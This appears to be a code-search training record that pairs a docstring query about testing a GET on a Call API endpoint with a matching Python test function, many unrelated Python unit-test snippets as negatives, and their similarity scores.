procedure is success\"\"\"\n p1 = models.Procedure.objects.create(\n name=\"procedure1\",\n overview='bla bla bla'\n )\n p1.speciality.set([self.speciality.pk])\n p1.save()\n\n p2 = models.Procedure.objects.create(\n name=\"procedure2\",\n overview='bla bla bla'\n )\n p2.speciality.set([self.speciality.pk])\n p2.save()\n\n res = self.client.get(PROCEDURE_URL)\n\n procedures = models.Procedure.objects.all().order_by(\"-name\")\n ser = serializer.ProcedureSerializer(procedures, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 2)\n self.assertEqual(res.data, ser.data)", "def test_callback_calls_celery_task(self, rf):\n product = product_factory()\n request = rf.post('/')\n\n url = request.build_absolute_uri(product.get_absolute_url())\n\n with patch('remindme.tasks.send_notification_email.delay') as task:\n product_in_stock_callback(\n self.__class__, product=product, request=request\n )\n task.assert_called_with(product.pk, product.title, url)", "def test_make_request_method(self, m_requests, m_sleep):\r\n request = testing.DummyRequest({mut.URL_KEY: SAMPLE_URL, \r\n mut.METHOD_KEY: SAMPLE_METHOD})\r\n m_response, response_dict = self.mock_response()\r\n m_requests.post.return_value = m_response\r\n self.assertEqual(response_dict, mut.make_request(request))\r\n m_requests.post.assert_called_with(url=SAMPLE_URL)\r\n m_sleep.assert_called_with(mut.SECURITY_SLEEP)", "def test_restart(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call\n self.assertTrue(rpc.restart())\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call()],\n self.supervisor.supvisors.fsm.on_restart.call_args_list)", "def run_single_test(self, config):\n path_name = config['path_name']\n for request in config['request']:\n with self.subTest(request=request, test_name=config['test_name']):\n if 'args' in request:\n url = reverse(path_name, kwargs=request['args'])\n else:\n url = reverse(path_name)\n\n query_params = None\n if 'query_params' in request:\n query_params = urlencode(request['query_params'])\n url = '{}?{}'.format(url, query_params)\n\n data = None\n data_format = 'json'\n if 'data' in request:\n data = request['data']\n\n if 'data_format' in request:\n data_format = request['data_format']\n\n response_check = None\n if 'response_check' in request:\n response_check = request['response_check']\n\n self.call_api(\n url,\n data,\n self.tokens[request['user']],\n request['status'],\n config['type'],\n data_format=data_format,\n response_check=response_check)", "async def test_create_vehicle_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/vehicles/{vehicle_id}/dispatch/routes'.format(vehicle_id=56),\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_setup_post(hass: HomeAssistant) -> None:\n respx.post(\"http://localhost\").respond(\n status_code=HTTPStatus.OK, json={\"key\": \"123\"}\n )\n assert await async_setup_component(\n hass,\n SENSOR_DOMAIN,\n {\n SENSOR_DOMAIN: {\n \"platform\": DOMAIN,\n \"resource\": \"http://localhost\",\n \"method\": \"POST\",\n \"value_template\": 
\"{{ value_json.key }}\",\n \"payload\": '{ \"device\": \"toaster\"}',\n \"name\": \"foo\",\n \"unit_of_measurement\": UnitOfInformation.MEGABYTES,\n \"verify_ssl\": \"true\",\n \"timeout\": 30,\n \"authentication\": \"basic\",\n \"username\": \"my username\",\n \"password\": \"my password\",\n \"headers\": {\"Accept\": CONTENT_TYPE_JSON},\n }\n },\n )\n await hass.async_block_till_done()\n assert len(hass.states.async_all(SENSOR_DOMAIN)) == 1", "def test_fax_inbound_automation_get(self):\n pass", "def test_get_one_flow_requests_as_super_client(self):\n headers = self._get_oauth_header(client_name=DISPATCHER_NAME)\n res = self.client.get('/v1/flow_requests/p_11111/', **headers)\n self.assertEqual(res.status_code, 200)\n profile = {\n 'code': 'PROF_001',\n 'version': 'v0',\n 'payload': '[{\"clinical_domain\": \"Laboratory\"}]'\n }\n expected = {\n 'flow_id': 'f_11111',\n 'process_id': 'p_11111',\n 'status': 'PE',\n 'profile': profile,\n 'sources': [{\n 'source_id': SOURCE_1_ID,\n 'name': SOURCE_1_NAME,\n 'profile': profile\n }],\n 'start_validity': '2017-10-23T10:00:00+02:00',\n 'expire_validity': '2018-10-23T10:00:00+02:00'\n }\n self.assertDictEqual(res.json(), expected)", "def test_single_request(self):\n s = self.api.session()\n s.request(\"1.2.3.4\", \"mozilla\", \"/foo/bar\").end()\n s.end()\n data = self.connector.transcription()\n assert len(data) == 2\n assert data[0].get('action') == \"session_start\"\n assert data[1].get('action') == \"session_end\"", "def test_ai_create_registred(self, mock_get_categories):\n\n response = self.client.get(reverse('studio:ai.wizard'))\n self.assertEqual(response.status_code, 200)", "async def test_create_dvir(client):\n create_dvir_param = {}\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/maintenance/dvirs',\n headers=headers,\n json=create_dvir_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_request():\n return make_response(\"ok\")", "def test_fund_withdrawal_start(self):\r\n with self.client as c:\r\n results = c.post(\r\n \"/retiros-para-agotar-fondos\",\r\n data=json.dumps(RETIRO_PARA_FONDO_JSON_1),\r\n headers=TestRetirementCalculator.request_headers,\r\n )\r\n data = json.loads(results.data)\r\n\r\n self.assertDictEqual(data, RETIRO_PARA_FONDO_RESULT_1)", "def test_data_framing(self):\n self.start_all_services()\n deproxy_cl = self.get_client(\"deproxy\")\n deproxy_cl.parsing = False\n request_body = \"x\" * 100\n\n deproxy_cl.make_request(request=self.post_request, end_stream=False)\n for byte in request_body[:-1]:\n deproxy_cl.make_request(request=byte, end_stream=False)\n deproxy_cl.make_request(request=request_body[-1], end_stream=True)\n\n self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)", "def test_post(self):\n client = RestClient(host=self.host, username='')\n rest_url = 'some/url/'\n \n # Mock good response\n with responses.RequestsMock() as rsps:\n rsps.add(responses.POST, f'{self.host}/{rest_url}', status=200,\n json={'value':\"good!\"})\n r = client.post(rest_url)", "def test_build_payload(self):\n pytrend = TrendReq()\n pytrend.build_payload(kw_list=['pizza', 'bagel'])\n self.assertIsNotNone(pytrend.token_payload)", "def test_get_start_form_data(self):\n pass", "def test_get_start_true(self):\n\n tt = TemperatureTracker()\n tt.start()\n 
self.assertIsNotNone(tt.get_start())", "def start_flow():\n if request.method == 'GET':\n tel = request.args.get('tel')\n flow = request.args.get('flow')\n to_rp = request.args.get('to')\n if to_rp == \"io\":\n client = io_client\n elif to_rp == \"datos\":\n client = mx_client\n else:\n return jsonify({}), 404\n contact = client.get_contacts(urn=['tel:+52' + tel]).all()\n if contact:\n client.create_flow_start(\n flow=flow,\n contacts=[contact[0].uuid],\n )\n return jsonify({\"Inicio_flow\": \"Si\"}), 201\n return jsonify({\"Inicio_flow\": \"No\"}), 404", "def test_start_mdt(self):\n response = self.client.get(reverse('start-mdt', args=[self.sample_type]), follow=True)\n self.assertContains(response, self.proband.gel_id)\n self.assertEqual(response.status_code, 200)", "def post(self):\n data = api.payload\n\n try:\n phone_call_start = repository.find_start_call_by_call_id(data[\"call_id\"])\n except NoResultFound:\n return 'no call found by specified call id', 404\n\n phone_call_start.end_timestamp = parser.parse(data[\"end_timestamp\"]).replace(tzinfo=None)\n\n # repository.session.add(phone_call_start)\n repository.db.session.commit()\n\n return phone_call_start", "async def test_create_driver_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/drivers/{driver_id}/dispatch/routes'.format(driver_id=56),\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def setUp(self):\n url = reverse('signup')\n self.response = self.client.post(url, {}) # submit an empty dictionary", "def test_too_late_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.ios_app,\n )\n call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'\n\n # Start thread to simulate asteriks waiting for response.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n too_late_time = time.time()\n # Wait the wait time + 1 second.\n too_late_wait_time = (settings.APP_PUSH_ROUNDTRIP_WAIT + 1000) / 1000\n\n # Simulate some too long wait time for device to respond.\n time.sleep(too_late_wait_time)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': too_late_time,\n }\n\n # Send the fake response from device which should be too late.\n too_late_response = self.client.post(self.response_url, app_data)\n\n self.assertEqual(too_late_response.status_code, 404)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call resulted in a NAK.\n self.assertEqual(response.content, b'status=NAK')\n self.assertEqual(cache.get('attempts'), 3)", "def test_1():\n\tassert api_call().status_code == 200", "async def test_10() -> None:\n LOG.debug(\"Test post query (fail to access registered data (no token))\")\n payload = {\n \"referenceName\": \"MT\",\n \"start\": 9,\n \"referenceBases\": \"T\",\n \"alternateBases\": \"C\",\n 
\"assemblyId\": \"GRCh38\",\n \"datasetIds\": [\"urn:hg:1000genome:registered\"],\n \"includeDatasetResponses\": \"HIT\",\n }\n async with aiohttp.ClientSession() as session:\n async with session.post(\"http://localhost:5050/query\", data=json.dumps(payload)) as resp:\n data = await resp.json()\n assert \"WWW-Authenticate\" in resp.headers, \"Missing WWW-Authenticate header\"\n assert data[\"exists\"] is None, sys.exit(\"Query POST Endpoint Error!\")\n assert resp.status == 401, \"HTTP Status code error\"", "def test_tick(requests_mock, test_operator):\n tick_url = (\"https://habitica.com/api/v3/tasks/{}/score/up\"\n \"\".format(\"963e2ced-fa22-4b18-a22b-c423764e26f3\"))\n test_operator.tick_task(\"Test habit\")\n\n assert len(requests_mock.request_history) == 2\n tick_request = requests_mock.request_history[1]\n assert tick_url in tick_request.url", "def trigger_service(call):\n event = call.data.get(ATTR_EVENT)\n value1 = call.data.get(ATTR_VALUE1)\n value2 = call.data.get(ATTR_VALUE2)\n value3 = call.data.get(ATTR_VALUE3)\n if event is None:\n return\n\n try:\n import pyfttt as pyfttt\n pyfttt.send_event(key, event, value1, value2, value3)\n except requests.exceptions.RequestException:\n _LOGGER.exception(\"Error communicating with IFTTT\")", "def setUp(self):\n self.response = self.s.get(self.url, params=self.params)", "def test_make_request(self, m_requests, m_sleep):\r\n request = testing.DummyRequest({mut.URL_KEY: SAMPLE_URL})\r\n m_response, response_dict = self.mock_response()\r\n m_requests.get.return_value = m_response\r\n self.assertEqual(response_dict, mut.make_request(request))\r\n m_requests.get.assert_called_with(url=SAMPLE_URL)\r\n m_sleep.assert_called_with(mut.SECURITY_SLEEP)", "def test_new_user_request(self):\r\n # Send a request\r\n values = {'username': u'user100',\r\n 'external_id': '4', 'email': u'[email protected]'}\r\n data = json.dumps(values)\r\n headers = {'Content-Type': 'application/json', 'Content-Length': len(data), 'X-Edx-Api-Key': 'TEST_API_KEY'}\r\n req = urllib2.Request(self.server_url + '/api/v1/users/4', data, headers)\r\n\r\n # Send the request to the mock cs server\r\n response = urllib2.urlopen(req)\r\n\r\n # Receive the reply from the mock cs server\r\n response_dict = json.loads(response.read())\r\n\r\n # You should have received the response specified in the setup above\r\n self.assertEqual(response_dict, self.expected_response)", "def test_total_fund_start(self):\r\n with self.client as c:\r\n results = c.post(\r\n \"/fondo-para-retiros\",\r\n data=json.dumps(FONDO_PARA_RETIRO_JSON_1),\r\n headers=TestRetirementCalculator.request_headers,\r\n )\r\n data = json.loads(results.data)\r\n\r\n self.assertDictEqual(data, FONDO_PARA_RETIRO_RESULT_1)", "def test_post(self):\n # Create the request\n data = {\n 'device_date': '2017-01-01',\n 'device_type': 'sensor',\n 'status': 'online'\n }\n request_factory = RequestFactory()\n request = request_factory.post(reverse('filter_devices'), data)\n\n # Get the response\n response = FilterDevicesView.as_view()(request)\n self.assertEqual(response.status_code, 200)", "def startTestRun(self):", "def testWholeRequest(self):\n body = self.protocol.encode_message(self.request_message)\n self.Reinitialize(input=body,\n content_type=self.content_type)\n self.factory.add_request_mapper(self.mapper())\n self.service_handler.handle('POST', '/my_service', 'method1')\n VerifyResponse(self,\n self.service_handler.response,\n '200',\n 'OK',\n self.protocol.encode_message(self.response_message),\n self.content_type)", "async 
def test_pin_request_succeeds(hass: HomeAssistant) -> None:\n flow = config_flow.EcobeeFlowHandler()\n flow.hass = hass\n flow.hass.data[DATA_ECOBEE_CONFIG] = {}\n\n with patch(\"homeassistant.components.ecobee.config_flow.Ecobee\") as mock_ecobee:\n mock_ecobee = mock_ecobee.return_value\n mock_ecobee.request_pin.return_value = True\n mock_ecobee.pin = \"test-pin\"\n\n result = await flow.async_step_user(user_input={CONF_API_KEY: \"api-key\"})\n\n assert result[\"type\"] == data_entry_flow.FlowResultType.FORM\n assert result[\"step_id\"] == \"authorize\"\n assert result[\"description_placeholders\"] == {\"pin\": \"test-pin\"}", "async def setUp(self):\n self.requestor = Requestor(\"asyncprawcore:test (by /u/Lil_SpazJoekp)\")\n self.recorder = vcr", "def testSimpleLoadTestWithSubscription(self):\n def sendRequestExpect200():\n response = requests.get(\"http://localhost:%d/weather/alice\" % self.port_number)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.text, 'cloudy')\n # Subscribe Alice to weather updates so that messages\n # are persisted when posted.\n response = requests.post(\"http://localhost:%d/weather/alice\" % self.port_number, data='')\n self.assertEqual(response.status_code, 200)\n # Check that server stays up after multiple requests.\n self.runMultipleRequests(100, sendRequestExpect200)", "def test_run_started(self):", "def _spy_on_make_request(self):\n data = {}\n\n def _make_request(api, url, body=None, method='GET', headers={},\n content_type=None):\n # We can't actually do any assertions in here, because they'll get\n # swallowed by SignalHook's sandboxing. We therefore record the\n # data we need and assert later.\n data['url'] = url\n data['request'] = json.loads(body)['request']\n return '{}'\n\n self.spy_on(TravisAPI._make_request, owner=TravisAPI,\n call_fake=_make_request)\n\n return data", "def test_post_setpoint_200(client, auth_header):\n data = {'value': 1}\n\n with client as cl:\n res = cl.post('/gpio/3/setpoint',\n headers=auth_header,\n data=json.dumps(data))\n\n assert res.status_code == 200\n assert res.headers.get('Content-Type') == 'application/json'\n assert json.loads(res.data.decode('utf8')) == data", "def test_api_use_ntc_post(self):\n body = Topup()\n response = self.client.open(\n '/api/use/ntc/',\n method='POST',\n data=json.dumps(body),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_registred(\n self, mock_get_ai_details, mock_get_ai, mock_get_purchased, mock_get_categories\n ):\n\n # We mock API calls\n mock_get_ai.return_value = self.ai\n mock_get_ai_details.return_value = self.ai_details\n mock_get_purchased.return_value.json.return_value = [\n factory.build(dict, FACTORY_CLASS=AiFactory),\n factory.build(dict, FACTORY_CLASS=AiFactory),\n factory.build(dict, FACTORY_CLASS=AiFactory)\n ]\n\n response = self.client.get(reverse(\n 'studio:skills',\n kwargs={\n 'aiid': self.ai['aiid']\n }\n ))\n self.assertEqual(response.status_code, 200)", "def test_cron(mock_post, test_operator, header_fx):\n test_operator.cron()\n mock_post.assert_called_with(\"https://habitica.com/api/v3/cron\",\n headers=header_fx)", "def test_rpcCall(self):\n pass", "def call(self, request, expect=error.OK):\n response = self.client.call(request)\n self.check_response(response, expect=expect)\n return response", "def test_not_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': 
'0123456789',\n }\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.ios_app,\n )\n call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n 'available': 'False',\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=NAK')\n self.assertEqual(cache.get('attempts'), 2)", "def test_create_event_load(self):\n res = self.client.get('/create-event')\n data = res.data.decode('utf-8')\n assert res.status == '200 OK'\n assert 'Create Event' in data", "def invoke():\n # CONFIG: Read configuration information\n config = conf.get_yaml_field(gl.configFile)\n dd_enable = config['ENABLE_DDING']\n dd_token = config['DD_TOKEN']\n dd_url = config['DING_URL']\n email_enable = config['EMAIL_ENABLE']\n # END CONFIG.\n\n # Test report file name.\n time_str = time.strftime('%Y%m%d_%H%M%S', time.localtime())\n path = RunTestCase.create_report_file()\n\n # Start test the send pin message.\n if dd_enable:\n scripts.send_msg_dding(\n '{}:★开始API接口自动化测试★'.format(time_str),\n dd_token,\n dd_url\n )\n\n # Execute the test and send the test report.\n RunTestCase.run(path)\n if dd_enable:\n # Template message.\n dir_list = path.split('\\\\')\n low_path = dir_list[len(dir_list) - 2]\n msg = RunTestCase.tmpl_msg(low_path)\n print(msg)\n scripts.send_msg_dding(msg, dd_token, dd_url)\n\n if email_enable:\n # Send test report to EMAIL.\n email = EmailClass()\n email.send(path)", "def test_api_use_method_post(self):\n body = Body()\n response = self.client.open(\n '/api/use/{method}/'.format(method='method_example'),\n method='POST',\n data=json.dumps(body),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_start_test(self):\n self.protocol.startTest(self.test)\n self.assertEqual(self.io.getvalue(), compat._b(\n \"test: %s\\n\" % self.test.id()))", "async def test_api_fire_event_with_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n @ha.callback\n def listener(event):\n \"\"\"Record that our event got called.\n\n Also test if our data came through.\n \"\"\"\n if \"test\" in event.data:\n test_value.append(1)\n\n hass.bus.async_listen_once(\"test_event_with_data\", listener)\n\n await mock_api_client.post(\"/api/events/test_event_with_data\", json={\"test\": 1})\n\n await hass.async_block_till_done()\n\n assert len(test_value) == 1" ]
[ "0.77212137", "0.7614569", "0.7375702", "0.69436055", "0.68681324", "0.6717918", "0.66508937", "0.63880897", "0.62512255", "0.61260146", "0.58564955", "0.5841628", "0.5779191", "0.57728964", "0.57675964", "0.56549394", "0.55403256", "0.54902625", "0.54620844", "0.5461441", "0.5435268", "0.5428295", "0.5424061", "0.5415708", "0.5410459", "0.53994805", "0.5396184", "0.5395218", "0.53943104", "0.5381876", "0.5381161", "0.5364877", "0.53572965", "0.53570443", "0.5353539", "0.5352352", "0.5351343", "0.53455323", "0.5336515", "0.5326417", "0.5318902", "0.531119", "0.5277401", "0.5274008", "0.5265764", "0.5265737", "0.52353746", "0.5227659", "0.5220983", "0.52084416", "0.5207116", "0.5206367", "0.5198736", "0.5193965", "0.5184583", "0.5178288", "0.5177758", "0.51773226", "0.51739186", "0.5169439", "0.5166063", "0.51582754", "0.5158", "0.5155905", "0.5154054", "0.5151226", "0.5147424", "0.51417124", "0.5140942", "0.51289076", "0.51235896", "0.5121843", "0.512142", "0.51178485", "0.51132125", "0.51118296", "0.5111586", "0.51061934", "0.5105804", "0.5105764", "0.51020896", "0.50895655", "0.50888884", "0.508849", "0.5087005", "0.50839853", "0.5077931", "0.50772524", "0.50746644", "0.5073821", "0.5072926", "0.5070094", "0.5068577", "0.50673974", "0.50498927", "0.5042398", "0.5032106", "0.5029588", "0.50244254", "0.5024075" ]
0.85472727
0
Test a GET request on the Call API endpoint and expect it to return 200 OK
def test_GET_call_api_and_return_200Ok(client): url = '/api/v1/calls/' response = client.get(url) assert response.status_code == status.HTTP_200_OK
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get(self):\n self.assertEqual(200, self.resp.status_code)", "def test_get(self):\n self.assertEqual(200, self.resp.status_code)", "def test_1():\n\tassert api_call().status_code == 200", "def test_get(self):\n self.assertEqual(200, self.response.status_code)", "def test_get(self):\n self.assertEqual(200, self.response.status_code)", "def test_response_200_on_get(self):\n pass", "def test_status_ok(api_client):\n response = api_client.get()\n assert response.ok", "def test_get(self):\n expected_response = {\n 'id': 1111,\n 'first_name': 'Jhon',\n 'last_name': 'Doe',\n 'user_id': 1001,\n 'telegram_id': None\n }\n\n response = self.client.get(self.url)\n self.assertJSONEqual(json.dumps(expected_response), json.loads(response.content))\n self.assertEqual(response.status_code, 200)", "def test_get(self):\n client = RestClient(host=self.host, username='')\n rest_url = 'some/url/'\n \n # Mock good response\n with responses.RequestsMock() as rsps:\n rsps.add(responses.GET, f'{self.host}/{rest_url}', status=200,\n json={'value':\"good!\"})\n r = client.get(rest_url)", "def test_get_one(self):\n response = self.client.get('/api/v1/parcels/100')\n self.assertEqual(response.status_code, 200)", "def test_get(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)", "def test_get(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)", "def test_get(self):\n response = self.client.get('/weather/', format=\"json\")\n self.assertEqual(response.status_code, 200)", "def test_service_api_get(service_app):\n response = service_app.get('/')\n assert response.headers['Content-Type'] == 'application/json'\n assert response.status_code == 200\n assert json.loads(response.data) == {'description': 'service is up', 'status': 200}", "def test_get(self):\n return self.doRequest(self.url, method=\"GET\", body=self.input)", "def test_response_ok():\n\t\n\t# Send GET request to API given endpoint and store the response.\n\tresponse = get_items()\n\n\t# Confirm that the request-response cycle completed successfully.\n\t#assert_true(response.ok)\n\tif ('None' in response): print(\"Failed calling REST API: {}\".format(response))\n\telse: print(\"TC Passed, Response OK: {}\".format(response))", "def test_request():\n response = requests.get('http://jsonplaceholder.typicode.com/todos')\n assert response.ok", "def test_request(self):\n client = RestClient(host=self.host, username='')\n rest_url = 'some/url/'\n\n # Mock good get response\n with responses.RequestsMock() as rsps:\n rsps.add(responses.GET, f'{self.host}/{rest_url}', status=200,\n json={'value':\"good!\"})\n r = client.request('get', rest_url)\n assert r.status_code == 200\n assert r.json()['value'] == 'good!'\n \n # Mock bad get response\n with responses.RequestsMock() as rsps:\n rsps.add(responses.GET, f'{self.host}/{rest_url}', status=401,\n json={'value':\"bad!\"})\n with raises(requests.HTTPError):\n r = client.request('get', rest_url)\n r = client.request('get', rest_url, checkstatus=False)\n assert r.status_code == 401\n assert r.json()['value'] == 'bad!'", "def test_site_get_status_200_code(api_client):\n r = api_client.get(path=\"/\")\n assert r.status_code == 200", "def test_get_response(self):\n c = Client()\n response = c.get(reverse('index_view'))\n self.assertEqual(response.status_code, 200)", "def test_mock_get_ok(mock_get):\n\n # Configure the mock to return response/OK status code.\n mock_get.return_value.ok = True\n\n # Send GET request to API given endpoint and 
store the response.\n response = get_items()\n\n # Confirm that the request-response cycle completed successfully.\n if ('None' in response):\n print(\"Failed calling REST API: {}\".format(response))\n else:\n print(\"TC Passed, Response OK\".format(response))", "def test_get_requests(self):\n response = self.client.open('/api/provisioning/port',\n method='GET')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def test_hello(client):\n\n res = client.get('/api')\n assert res.get_json().get('msg') != None", "def test_ice_and_fire_external(self):\n response = self.client.get('/api/external-books?name=A Game of Thrones', format='json')\n self.assertEqual(200, response.data['status_code'])", "def test_api_response(self):\n # url = 'http://127.0.0.1:8000/api/aircraft/'\n url = reverse('airlines:aircraft-list')\n response = self.client.get(url, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def test_users_endpoint_response_with_code_status_200():\n response = api_helper.get_users()\n assert response.status_code == 200", "def test_successful_on_get(self):\n\n url = '/%s/jobs/' % self.api\n\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)", "def test_basic_fetch(client):\n\n res = client.get('/api/reminders')\n assert res.status_code == 200\n assert res.content_type == 'application/json'", "def test_mocked_get_api(self):\n c = Client()\n response = c.get(\"/apimock/mocked/api/account/154/\")\n self.assertEqual(response.status_code, 200)\n self.assertIn(\n '<table border=\"1\"><tr><th>amount</th><td>10PLN</td></tr></table>', response.content)\n response2 = c.get(\"/apimock/mocked/api/account/187/\")\n self.assertEqual(response2.status_code, 200)\n self.assertIn(\n '<table border=\"1\"><tr><th>amount</th><td>10PLN</td></tr></table>', response2.content)", "def test_two_legged_get(self):\n resp, content = self._two_legged(\"GET\")\n self.assertEqual(int(resp['status']), 200)", "def test_get_status(self):\n response = self.client.open(\n '/v1/status',\n method='GET')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_call(self):\n\n with Client('username', 'password') as client:\n self.setSessionResponse(content='{\"ok\": true}')\n data = client.call(**self.build_parameters)\n self.assertEqual(data, '{\"ok\": true}')", "def test_GET5(self):\n r = requests.get(self.address + \"/carca\")\n self.assertEqual(r.status_code, 400)", "def test_GET_fetcher():\n params = {\n 'key1':'value1',\n 'arg2':'value2'\n }\n\n ## test that request goes ok\n resp = wf_utils.fetch_GET_request(\n GET_ECHO_ENDPOINT,\n params=params\n )\n\n ## test that response json can be parsed\n payload = resp.json()\n\n ## test that response contains expected echo\n assert payload['args'] == params\n assert payload['headers']['user-agent'] == wf_utils.USER_AGENT", "def testGet(self):\n response = self.runGet(self.root)\n self.response_200(response)\n data = json.loads(response.content.decode(\"utf-8\"))\n self.assertEqual(len(data), 1)", "def test_root_response():\n request, response = app.test_client.get(\"/info.json\")\n assert response.status == 200", "def test_info_get(self):\n response = self.client.open(\n '/info',\n method='GET')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_response_is_200(BASE_URL, COUNTRY_CODE):\n # make request\n result = requests.get(f'{BASE_URL}{COUNTRY_CODE}')\n assert 
result.status_code == 200", "def test_get_request_normal_response(self, mock_get):\n\n # Arrange\n # Construct our mock response object, giving it relevant expected behaviours\n mock_resp_instance = MockResponse({\"msg\": \"success\"}, 200, content=\"abc\")\n mock_get.return_value = mock_resp_instance\n\n # Act\n response = get_request_data(self.url, json_resp=False)\n\n # Assert that the request-response cycle completed successfully.\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, mock_resp_instance)", "def test_api_urls():\n # Test the status message - 404 not good , 200 good\n assert API_RH.create_req().status_code == 200, \"The tests for URLs were successful\"", "def test_get(self):\n url, port = self.server.address\n\n #couple of basic GETs\n r = self.client.get(\"http://{0}:{1}/\".format(url, port))\n self.assertEqual(200, r.status_code)\n r = self.client.get(\"http://{0}:{1}\".format(url, port))\n self.assertEqual(200, r.status_code)\n r = self.client.get(\"http://{0}:{1}/200\".format(url, port))\n self.assertEqual(200, r.status_code)\n r = self.client.get(\"http://{0}:{1}/400\".format(url, port))\n self.assertEqual(400, r.status_code)\n\n # GETs with params\n r = self.client.get(\"http://{0}:{1}/get_with_params\".format(url, port),\n params=self.params)\n self.assertEqual(200, r.status_code)\n self.assertEqual(str(self.params), r.text)\n\n # GETs with ...?", "def test_doGet(self) -> None:\n\n status_code = apicall.doGet(URL, self._browserheader)\n print(\"in do get:\", status_code)\n assert status_code == API_SUCCESS", "def test_GET(self):\n if not self.url:\n return\n response = self.client.get(self.url, {}, format='json')\n self.assertIn(response.status_code, [status.HTTP_405_METHOD_NOT_ALLOWED,\n status.HTTP_401_UNAUTHORIZED])", "def test_GET3(self):\n r = requests.get(self.address)\n self.assertEqual(r.status_code, 400)", "def test_getting_todos(mock_get):\n mock_get.return_value.ok = True\n\n # Call the service, which will send a request to the server.\n response = get_todos()\n\n # If the request is sent successfully, expect a response to be returned.\n assert response is not None", "def test_get_api(self):\n # Get metadata list\n _logger.info('Get sequencerun API')\n response = self.client.get('/sequencerun/')\n self.assertEqual(response.status_code, 200, 'Ok status response is expected')\n\n _logger.info('Check if API return result')\n result_response = response.data['results']\n self.assertGreater(len(result_response), 0, 'A result is expected')\n\n _logger.info('Check if unique data has a single entry')\n response = self.client.get('/sequencerun/?msg_attr_action=statuschanged')\n results_response = response.data['results']\n self.assertEqual(len(results_response), 1, 'Single result is expected for unique data')\n\n _logger.info('Check Invalid keyword')\n response = self.client.get('/sequencerun/?foo=bar')\n results_response = response.data['results']\n self.assertEqual(len(results_response), 0, 'No results are expected for unrecognized query parameter')", "def test_get_main_route():\n response = client.get(url)\n assert response.status_code == 200", "def test_services_endpoint(self):\n with open('demo/tests/mock_results.json', 'r') as result_file:\n data = result_file.read()\n expected_response = json.loads(data)[\"test_service_calls\"]\n\n responses.add(\n responses.GET,\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service',\n json=expected_response,\n status=200\n )\n resp = requests.get(\n 
